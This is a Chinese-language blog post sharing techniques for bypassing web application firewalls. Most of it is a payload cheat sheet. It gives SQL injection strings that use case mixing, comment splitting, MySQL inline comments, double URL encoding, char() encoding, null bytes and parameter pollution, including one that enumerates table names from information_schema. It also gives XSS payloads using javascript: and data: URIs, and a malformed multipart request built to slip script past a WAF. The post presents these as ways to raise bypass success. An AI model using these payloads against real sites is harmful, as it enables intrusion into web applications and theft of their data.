因工作原因研究了幾天WAF繞過，簡單分享下WAF繞過思路。

對一些攻擊特征串進(jìn)行不同的編碼，如：URL編碼，ASCII，Unicode.使用一些非標(biāo)準(zhǔn)的編碼很容易就造成WAF BYPASS.

一些字符非標(biāo)準(zhǔn)的unicode碼：

用NULL對數(shù)據(jù)截?cái)啵?jīng)測試發(fā)現(xiàn)，靈活使用NULL字節(jié)可以有效避開配置為阻止包含已知攻擊字符串的請求的WAF。

有時(shí)，把使用GET方法的攻擊轉(zhuǎn)換成使用POST方法的攻擊可能會(huì)避開某些過濾。許多應(yīng)用程序在整個(gè)應(yīng)用程序中執(zhí)行某正常規(guī)過濾，阻止已知的攻擊字符串。如果一個(gè)應(yīng)用程序希望收到使用GET方法的請求，它能之對URL查詢字符串執(zhí)行這種過濾。將請求轉(zhuǎn)換為使用POST就可以完全避開這種過濾。

看一個(gè)在沒有正確解析HTTP Request數(shù)據(jù)包導(dǎo)致的WAF繞過，觸發(fā)一個(gè)XSS：

POST /demo.php HTTP/1.0

Content-Type: multipart/form-data; boundary=0000

Content-Length: 97

–0000–

Content-Disposition: form-data; name=x’;filename=”‘;name=payload;”

<script>alert(1)</script>

–0000–

正常的HTTP應(yīng)該是如下：

POST /demo.php HTTP/1.0

Content-Type: multipart/form-data; boundary=0000

Content-Length: 97

–0000–

Content-Disposition: form-data; name=”upfile”; filename=”payload”

<script>alert(1)</script>

–0000–

對比上面?zhèn)z個(gè)HTTP頭，給我們提供了WAF繞過的思路，修改攻擊特征串或HTTP中的一細(xì)節(jié)，讓W(xué)AF無法解析或者解析錯(cuò)誤導(dǎo)致繞過。（許多WAF對無法解析的HTTP頭，默認(rèn)直接BYPASS）

羅列了一小部分的基本的繞過技巧（許多技巧因與工作相關(guān)無法分享，望見諒～^_^）。

這些技巧不一定能成功繞過WAF，但在許多場合下，通過一些基本技巧組合的使用，能提高繞過WAF的成功率，甚至完全BYPASS。

Sql Injection Bypass

大小寫變種：

UnIon/**/sElEcT/**/1,2,3/**/fRoM/**/Users–

使用注釋：

如上。在MySql中使用類似如下攻擊依然有效：

‘/**/UN/**/ION/**/SEL/**/ECT/**/1,2,3/**/FROM/table–

內(nèi)聯(lián)內(nèi)容(MySql Only)：

/*!UnIoN*/SeLecT+1,2,3–

/*!UnIoN*/+/*!SeLecT*/+1,2,concat(/*!table_name*/)+FrOm/*!information_schema*/.tables/*!WhErE*/+/*!TaBlE_sChEMa*/+like+database()–

嵌套表達(dá)式：

UNunionION+SEselectLECT+1,2,3–

編碼：

2次URL編碼：

%252f%252a*/union%252f%252a*/select%252f%252a*/1,2,3%252f%252a*/from%252f%252a*/users–

ASCII:

“SELECT” ASCII Encode in databases.

MySql: char(83,69,76,69,67,84)

Oracle: chr(83)||chr(69)||chr(76)||chr(69)||chr(67)||chr(84)

Ms-Sql: char(chr(83)+chr(69)+chr(76)+chr(69)+chr(67)+chr(84))

使用空字節(jié)：

%00′ union+select+1,2,3–

uni%0bon+se%0blect+1,2,3–

參數(shù)污染（ASP/ASP.NET）：

id=1/**/union/*&id=*/select/*&id=*/pwd/*&id=*/from/*&id=*/users

XSS Bypass：

腳本標(biāo)簽：

<object data=”data:text/html,<script>alert(1)</script>”>

<object data=”data:text/html;base64,Jmx0O3NjcmlwdCZndDthbGVydCgxKSZsdDsvc2NyaXB0Jmd0Ow==”>

<a href=”data:text/html;base64,Jmx0O3NjcmlwdCZndDthbGVydCgxKSZsdDsvc2NyaXB0Jmd0Ow==”>xss</a>

腳本偽協(xié)議：

<object data=javascript:alert(1)>

<iframe src=javascritpt:alert(1)>

<embed src=javascript:alert(1)>

標(biāo)簽名稱：

<iMg onerror=alert(1) scr=a>

<[%00]img onerror=alert(1) scr=a>

<i[%00]mg onerror=alert(1) scr=a>

對標(biāo)簽名陳稍做修改，可以避開僅僅阻止特定標(biāo)簽名陳的過濾：

<x onclick=alert(1) src=a>xss</x>